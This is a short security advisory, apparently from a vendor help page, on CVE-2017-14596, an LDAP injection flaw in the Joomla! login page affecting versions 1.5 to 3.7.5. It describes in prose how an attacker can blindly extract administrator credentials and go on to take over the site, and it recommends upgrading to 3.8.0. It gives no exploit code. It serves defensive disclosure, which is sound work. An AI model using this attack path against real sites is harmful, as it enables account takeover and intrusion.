edit-icon download-icon

[Vulnerability notice] CVE-2017-14596: LDAP injection vulnerability in Joomla!

Last Updated: Apr 08, 2018

Joomla! is a popular open-source website project. On September 20, 2017, security researchers detected an LDAP injection vulnerability in the Joomla! logon controller over RIPS. The vulnerability may allow a remote attacker to obtain the superuser password by using the blinding technology. If LDAP authentication is configured on the Joomla! 3.7.5 website, the attacker can obtain the superuser password merely in 20 seconds.

See the following for more information about the vulnerability.


CVE identifier

CVE-2017-14596

Vulnerability name

Joomla! LDAP injection vulnerability

Vulnerability rating

High

Vulnerability description

The vulnerability on the logon page allows a remote attacker to extract all the authentication credentials from the LDAP server used by Joomla!. The credentials include the user names and passwords of the superuser and the Joomla! administrator. By uploading custom Joomla! extensions and performing remote code execution, the attacker can log on to the administrator control panel with the credentials and take over the Joomla! system and potential web servers.

Condition and method of exploitation

The vulnerability is remotely exploitable when LDAP authentication is configured in Joomla!

Affected scope

Joomla! 1.5-3.7.5

Unaffected version: Joomla! 3.8.0

Vulnerability detection

Check whether LDAP authentication is used and whether any affected version of Joomla! is used.

How to fix or mitigate

We recommend that you upgrade Joomla! to the latest official version 3.8.0.

Reference

[1]. https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
[2]. https://www.joomla.org/announcements.html
[3]. https://downloads.joomla.org/

Thank you! We've received your feedback.